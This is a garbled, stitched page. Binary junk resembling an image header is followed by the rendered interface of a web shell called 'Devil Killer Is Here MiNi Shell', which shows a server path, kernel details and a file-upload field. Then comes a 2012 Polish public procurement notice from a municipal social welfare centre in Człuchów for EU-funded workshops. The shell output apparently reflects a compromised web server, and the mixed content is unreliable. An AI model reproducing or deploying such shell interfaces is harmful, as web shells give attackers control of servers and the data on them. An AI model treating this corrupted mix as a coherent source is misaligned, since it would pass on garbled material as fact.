JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120214/44488-N-2012.html

<p class="kh_header"><b>Człuchów: Przedmiot zamówienia dotyczy realizacji  zajęć aktywizujących dla uczestników 
2 projektów współfinansowanych ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 44488 - 2012; data zamieszczenia: 14.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Średnia 14, 77-300 Człuchów, woj. pomorskie, tel. 0-59 8342409, 8344321, faks 0-59 8344321.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mopsczluchow.neostrada.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiot zamówienia dotyczy realizacji  zajęć aktywizujących dla uczestników 
2 projektów współfinansowanych ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie składa się z 4 części:

Część I zamówienia -  warsztaty psychologiczne -  podstawy komunikacji
1.Nazwa projektu: Promocja Integracji Społecznej na terenie miasta Człuchów 2.Zakres przedmiotu zamówienia (liczba uczestników i godzin szkolenia): Zamawiający skieruje na warsztaty łącznie 15 osób, w jednej grupie szkoleniowej. Uczestnikami warsztatów będą klienci MOPS. Całkowita liczba godzin:  32 godziny. Zajęcia winny odbywać się w dni powszednie (od poniedziałku do piątku) w godzinach od 8.00 do 15.00, minimalnie 4 a maksymalnie 6 godzin dziennie. Zajęcia odbywać się winny maksymalnie 3 dni w tygodniu. Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę,  niedzielę oraz dni ustawowo wolne od pracy.Na 1 godzinę szkolenia przypada 45 minut zajęć dydaktycznych i 15 minut przerwy; istnieje możliwość kumulowania przerw, jednakże nie więcej niż 2 przerwy łącznie. 3. Miejsce realizacji szkolenia: Zamawiający wymaga, aby zajęcia odbywały się: sala szkoleniowa Miejskiego Ośrodka Pomocy Społecznej  w Człuchowie, przy ul. Średniej 14 77-300 Człuchów. Zamawiający udostępnia nieodpłatnie Wykonawcy, salę szkoleniową wyposażona w stoły, krzesła i flipchart.  W trakcie zajęć powinny być zapewnione warunki pracy zgodnie z przepisami BHP; Instrukcją Bezpieczeństwa Pożarowego. 4.Termin realizacji szkolenia: Od marca 2012r. maksymalnie do 30.06.2012. 5.Minimalny zakres programowy - opis modułów szkoleniowych:MODUŁ I - Trening intra- i interpersonalny:	Orientacja i integracja;Indywidualizacja i relacje;Zawiązanie współpracy; MODUŁ II - Warsztaty umiejętności psychospołecznych:Emocje w cyklu zmiany.Budowania poczucia własnej wartości.Radzenie sobie ze stresem.MODUŁ III - Warsztaty umiejętności psychospołecznych: Komunikacja interpersonalna.Postawa asertywna. Autoprezentacja. MODUŁ IV - Coaching grupowy:Wyznaczanie i osiąganie celów. Grupowe rozwiązywanie problemów.	Ewaluacja procesu.
6.Metody prowadzenia zajęć: Zamawiający wymaga, aby w co najmniej 70% zajęcie były prowadzone metodami aktywizującymi grupę szkoleniową. 7.  Koszty materiałów szkoleniowych. Wykonawca pokrywa koszty przygotowania materiałów szkoleniowych. Materiały przekazywane uczestnikom winny być opatrzone w logo Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej wraz z informacją o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Zamawiający natomiast zabezpiecza uczestnikom warsztatów materiały piśmiennicze (notatnik, długopis itp.)

Część II   -  warsztaty z zakresu aktywnego poszukiwania pracy  
1. Nazwa projektu:  Promocja Integracji Społecznej na terenie miasta Człuchów.2.Zakres przedmiotu zamówienia (liczba uczestników i godzin szkolenia):Zamawiający skieruje na warsztaty łącznie 14 osób, w jednej grupie szkoleniowej. Uczestnikami warsztatów będą klienci MOPS.Całkowita liczba godzin:  32 godziny Zajęcia winny odbywać się w dni powszednie (od poniedziałku do piątku) w godzinach od 8.00 do 15.00, minimalnie 4 a maksymalnie 6 godzin dziennie i maksymalnie 2 dni w tygodniu. Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę,  niedzielę oraz dni ustawowo wolne od pracy.Uwaga: na 1 godzinę szkolenia przypada 45 minut zajęć dydaktycznych i 15 minut przerwy; istnieje możliwość kumulowania przerw, jednakże nie więcej niż 2 przerwy łącznie. 3. Miejsce realizacji szkolenia: Zamawiający wymaga, aby: zajęcia odbywały się: sala szkoleniowa Miejskiego Ośrodka Pomocy Społecznej  w Człuchowie, przy ul. Średniej 14 77-300 Człuchów, Zamawiający udostępnia nieodpłatnie Wykonawcy, salę szkoleniową wyposażona w stoły, krzesła i flipchart . W trakcie zajęć powinny być zapewnione warunki pracy zgodnie z przepisami BHP; Instrukcją Bezpieczeństwa Pożarowego. 4.Termin realizacji szkolenia: Od marca 2012r. maksymalnie do 30.06.2012. 5.  Minimalny zakres programowy: Integracja grupy.Praca, bezrobocie - decyzje zawodowe.Bilans umiejętności, możliwości i predyspozycji zawodowych.Rynek pracy. Przedsiębiorczość - pomysł na własną firmę.Dokumenty aplikacyjne. Poszukiwanie ofert pracy.	 Umiejętności interpersonalne i rozmowa kwalifikacyjna. 6. Metody prowadzenia zajęć: 	Zamawiający wymaga, aby w co najmniej 60% zajęcia były prowadzone metodami aktywizującymi grupę szkoleniową. 7. Koszty materiałów szkoleniowych: Wykonawca pokrywa koszty przygotowania materiałów szkoleniowych. Materiały przekazywane uczestnikom winny być opatrzone w logo Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej wraz z informacją o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Zamawiający natomiast zabezpiecza uczestnikom warsztatów materiały piśmiennicze (notatnik, długopis itp.)

Części III  warsztaty z zakresu wizażu i stylizacji z elementami autoprezentacji
1. Nazwa projektu:Promocja Integracji Społecznej na terenie miasta Człuchów, 2. Zakres przedmiotu zamówienia (liczba uczestników i godzin szkolenia):Zamawiający skieruje na warsztaty łącznie 10 osób, w jednej grupie szkoleniowej. Uczestnikami warsztatów będą klienci MOPS. Całkowita liczba godzin:  25 godzin. Zajęcia winny odbywać się w dni powszednie (od poniedziałku do piątku) w godzinach od 8.00 do 15.00, 5 godzin tygodniowo. Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę, niedzielę oraz dni ustawowo wolne od pracy.Uwaga: na 1 godzinę szkolenia przypada 45 minut zajęć dydaktycznych i 15 minut przerwy; istnieje możliwość kumulowania przerw, jednakże nie więcej niż 2 przerwy łącznie. 3. Miejsce realizacji szkolenia: Zamawiający wymaga, aby: zajęcia odbywały się: sala szkoleniowa Miejskiego Ośrodka Pomocy Społecznej  w Człuchowie, przy ul. Średniej 14 77-300 Człuchów.Zamawiający udostępnia nieodpłatnie Wykonawcy, salę szkoleniową wyposażona w stoły, krzesła i flipchart. W trakcie zajęć powinny być zapewnione warunki pracy zgodnie z przepisami BHP; Instrukcją Bezpieczeństwa Pożarowego  4. Termin realizacji szkolenia:Od marca 2012r. maksymalnie do 30.06.2012.
5. Minimalny zakres programowy: Mój wizerunek, Wywieranie wrażenia.Etykieta biznesu w zakresie garderoby, dodatków, fryzur, makijażu.	Jak zgrać własny wygląd zewnętrzny, rodzaj urody i osobowość z rodzajem pracy. Analiza kolorystyczna  - dobór palety barw, Dobór fryzury - propozycje koloru i fryzur dobrane indywidualnie.	Stylizacja biznesowa - właściwe fasony ubrań, desenie  i materiały współgrające z typem figury. Dodatki: buty, torebki, apaszki, biżuteria. Autoprezentacja Kontrola własnego wizerunku. 	Psychologiczne znaczenie dobrego wizerunku.	Image spójny i jednoznaczny. 	Techniki autoprezentacyjne. Asertywność, czyli otwarte wyrażanie siebie i wyznaczanie własnych granic.	Pozytywna autoprezentacja w oparciu o własne doświadczenia, umiejętności, zasoby. Pisemny autoportret. Komunikacja interpersonalna. Komunikacja werbalna i niewerbalna. Wywieranie wpływu poprzez język ciała.Świadomość siebie i innych w procesie komunikacji interpersonalnej. Wizaż i stylizacja. Analiza kolorystyczna.	Makijaż dzienny bez koloru.Makijaż dzienny z kolorem wg analizy kolorystycznej. 6. Metody prowadzenia zajęć: Zamawiający wymaga, aby w co najmniej 60% zajęcia były prowadzone metodami aktywizującymi grupę szkoleniową. 7. Koszty materiałów szkoleniowych:Wykonawca pokrywa koszty przygotowania materiałów szkoleniowych. Materiały przekazywane uczestnikom winny być opatrzone w logo Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej wraz z informacją o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Zamawiający natomiast zabezpiecza uczestnikom warsztatów materiały piśmiennicze (notatnik, długopis itp.)

Części IV   warsztaty psychospołeczne pn. Poznajmy siebie z zakresu komunikacji, asertywności, radzenia sobie ze stresem, współpracy i umiejętności pracy w zespole, współdziałania w grupie.
1.Nazwa projektu:Razem możemy więcej!.2.Zakres przedmiotu umowy zamówienia (liczba uczestników i godzin szkolenia): Zamawiający skieruje na warsztaty łącznie 10 osób, w jednej grupie.Uczestnikami warsztatów będą członkowie Klubu Abstynenta.Całkowita liczba godzin:  72 godziny, z zastrzeżeniem,  24 godziny zajęć warsztatowych w sali szkoleniowej i 48 godzin zajęć warsztatowych- praktycznych w plenerze, przy konstruowaniu wiaty.   Koszt materiałów do budowy wiaty, wynagrodzenia dla  osoby nadzorującej budowę wiaty pokrywa Zamawiający. Ponadto zamawiający wymaga aby zajęcia  zostały zrealizowane przez 2 soboty w godzinach od 16.30 do 20.30(4godziny) i 2 niedziele w godzinach od 9.00 do 17.00 (8godzin)dla zajęć warsztatowych oraz przez 4 soboty w godzinach od 16.30 do 20.30(4godziny) i 4 niedziele w godzinach od 9.00 do 17.00(8godzin)  dla zajęć warsztatowych - praktycznych.Uwaga: na 1 godzinę szkolenia przypada 45 minut zajęć dydaktycznych i 15 minut przerwy; istnieje możliwość kumulowania przerw jednakże nie więcej niż dwie przerwy łącznie. 3. Miejsce realizacji szkolenia:	Zamawiający wymaga, aby: zajęcia odbywały się: sala szkoleniowa Miejskiego Ośrodka Pomocy Społecznej  w Człuchowie, przy ul. Średniej 14 77-300 Człuchów lub w siedzibie Klubu Abstynenta KROKUS  przy ul. Szkolnej 1 77-300 Człuchów. Zamawiający udostępnia nieodpłatnie Wykonawcy, salę szkoleniową wyposażona w stoły, krzesła i flipchart: w trakcie zajęć powinny być zapewnione warunki pracy zgodnie z przepisami BHP; Instrukcią Bezpieczeństwa Pożarowego. 4.Termin realizacji szkolenia:Od marca 2012r. maksymalnie do 31 maja 2012. 5.Minimalny zakres programowy:Emocje.Budowania poczucia własnej wartości.Radzenie sobie ze stresem.Poznanie samego siebie.Komunikacja interpersonalna.Postawa asertywna.Wyznaczanie i osiąganie celów.Grupowe rozwiązywanie problemów.Ewaluacja procesu.Role pełnione w grupie.Mocne i słabe strony.Umiejętność współdziałania i współpracowania w grupie.6.Metody prowadzenia zajęć:	Zamawiający wymaga, aby w co najmniej 70% zajęcie były prowadzone metodami aktywizującymi grupę szkoleniową.7.	Koszty materiałów szkoleniowych. Wykonawca pokrywa koszty przygotowania materiałów szkoleniowych. Materiały przekazywane uczestnikom winny być opatrzone w logo Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej wraz z informacją o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Zamawiający natomiast zabezpiecza uczestnikom warsztatów materiały piśmiennicze (notatnik, długopis itp.).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.Ocena  spełniania warunków udziału w postępowaniu  zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Dla części I przedmiotu zamówienia warunek uznaje się za spełniony, jeżeli wykonawca wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, co najmniej jedną usługę  szkoleniową w zakresie grupowych zajęć z zakresu treningu umiejętności interpersonalnych  dla co najmniej 10 osobowej grupy osób zagrożonych wykluczeniem społecznym  (np. klientów Ośrodka Pomocy Społecznej, Powiatowego Centrum Pomocy Społecznej),
b)Dla części II przedmiotu zamówienia warunek uznaje się za spełniony, jeżeli wykonawca wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, co najmniej jedną usługę  szkoleniową w zakresie grupowych zajęć  aktywizacji zawodowej dla co najmniej 10 osobowej grupy osób zagrożonych wykluczeniem społecznym  (np. klientów Ośrodka Pomocy Społecznej, Powiatowego Centrum Pomocy Społecznej),
c) Dla części III przedmiotu zamówienia warunek uznaje się za spełniony, jeżeli wykonawca wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, co najmniej jedną usługę  szkoleniową w zakresie warsztatów wizażu i autoprezentacji dla co najmniej 10 osobowej grupy osób zagrożonych wykluczeniem społecznym  (np. klientów Ośrodka Pomocy Społecznej, Powiatowego Centrum Pomocy Społecznej),
d) Dla części IV  przedmiot u zamówienia warunek uznaje się za spełniony, jeżeli wykonawca wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, co najmniej jedną usługę  szkoleniową w  zakresie grupowych zajęć z zakresu treningu umiejętności interpersonalnych  dla co najmniej 10 osobowej grupy osób zagrożonych wykluczeniem społecznym  (np. klientów Ośrodka Pomocy Społecznej, Powiatowego Centrum Pomocy Społecznej)
Przez osoby zagrożone wykluczeniem społecznym rozumie się osoby zagrożone wykluczeniem społecznym z co najmniej jednego powodu spośród wskazanych w art. 7 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (Dz. U. z dnia 2004 r. nr 64 poz. 593 z późn. zm.)

Przez umiejętności  interpersonalne rozumie się umiejętności społeczne, które wykorzystywane są  w relacjach z innymi ludźmi w celu osiągnięcia oczekiwanej skuteczności , inicjowania i podtrzymania pozytywnych relacji z innymi ludźmi (podejście związane z potrzebą aprobaty i akceptacji). Przykłady umiejętności interpersonalnych: nawiązywanie kontaktu z innymi; komunikacyjne: umiejętności uważnego słuchania, nadawania, przemawiania; autoprezentacji -zarządzania przekazem niewerbalnym i werbalnym; negocjacyjne; rozwiązywania konfliktów; pracy zespołowej; zachować asertywnych; adaptacji społeczne; itp.
Ocena  spełniania warunków udziału w postępowaniu  zostanie dokonana na podstawie 
dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocena  spełniania warunków udziału w postępowaniu  zostanie dokonana na podstawie 
dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, nie później niż na dzień składania ofert, że dysponuje/będzie dysponował co najmniej jednym trenerem/szkoleniowcem  posiadającym:
a) dla części I i IV przedmiotu zamówienia:  Wymagane wykształcenie: wykształcenie wyższe psychologiczne (dyplom magistra psychologii lub inny  dyplom uzyskany za granicą i uznany za równorzędny w Rzeczypospolitej Polskiej); Wymagane odpowiednie doświadczenie: przeprowadzenia min. 30 godzin szkolenia (zajęć grupowych, warsztatów) dla osób zagrożonych wykluczeniem społecznym,
b) dla części II przedmiotu zamówienia:  Wymagane wykształcenie: wykształcenie wyższe w zakresie/o specjalności doradca zawodowy bądź wykształcenie wyższe i studia podyplomowe w zakresie doradca zawodowy; Wymagane odpowiednie doświadczenie:  przeprowadzenia min. 30 godzin  szkolenia (zajęć grupowych, warsztatów) z zakresu aktywizacji zawodowej dla osób zagrożonych wykluczeniem społecznym
c) dla części IV przedmiotu zamówienia:  Wymagane wykształcenie: wykształcenie wyższe; Wymagane odpowiednie doświadczenie:  przeprowadzenia min. 20 godzin szkolenia (zajęć grupowych, warsztatów) z zakresu wizażu i autoprezentacji  dla osób zagrożonych wykluczeniem społecznym

Ocena  spełniania warunków udziału w postępowaniu  zostanie dokonana na podstawie 
dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocena  spełniania warunków udziału w postępowaniu  zostanie dokonana na podstawie 
dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>ofertę cenową 
odpowiednie pełnomocnictwa</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - doświadczenie - 15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W uzasadnionych przypadkach Zamawiający może wyrazić w formie pisemnej, zgodę na zmianę postanowień zawartej umowy w stosunku do treści umowy w zakresie: zmiana terminu realizacji zamówienia, zwiększenie lub zmniejszenie liczby uczestników. W/w zmiana możliwa jest dopuszczalna wyłącznie w przypadku opóźnień związanych z procesem rekrutacji uczestników projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopsczluchow.neostrada.pl/zamowienia%20pupliczne.htm<br>
